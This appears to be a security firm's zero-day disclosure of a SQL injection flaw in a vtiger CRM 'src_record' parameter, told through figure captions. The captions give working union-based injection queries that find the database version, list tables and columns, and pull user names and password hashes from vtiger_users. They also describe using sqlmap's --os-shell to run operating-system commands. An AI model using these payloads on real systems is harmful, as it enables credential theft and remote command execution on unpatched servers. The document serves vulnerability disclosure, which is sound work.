Securin Zero-Days

Figure1: Testing if the src_record parameter is vulnerable to SQLi with a single quotation mark(‘).

Note: The figure shows that the query was unsuccessful, and the length of the response is 9,690 bytes. SQL Injection

Figure2: Testing if the src_record parameter is vulnerable to SQLi with 2 single quotation marks (‘’).

Note: The figure shows that the query was successful, and the length of response is 10,957 bytes verifying that the parameter is vulnerable to SQL injection.

Figure3: Checking the version of the SQL database by exploiting SQLi.

Query Used: “-3096 union select 100′ UNION ALL SELECT version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL— IJXL ” 

Figure 4: Finding the name of the current database.

Query Used: “-3096 union select 100′ UNION ALL SELECT database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL—IJXL”

Figure 5: Finding tables in the current database.

Query Used: “-3096 union select 100′ UNION ALL SELECT group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database()—IJXL”

Figure 6: Finding names of columns in the vtiger_users table.

Query Used: “-3096 union select 100′ UNION ALL SELECT group_concat(column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name=”vtiger_users”– IJXL”

 Figure 7: Extracting data from the vtiger_users table.

Query Used:” -3096 union select 100′ UNION ALL SELECTgroup_concat(id,0x3a,user_name,0x3a,user_password,0x3a,first_name),NULL,NULL,NULL,NULL,NULL, NULL,NULL from vtiger_users– IJXL” 

 Figure 8: Checking if the current user is a database administrator with sqlmap.

Figure 9: Gaining shell and running OS-level commands using –os-shell switch in sqlmap.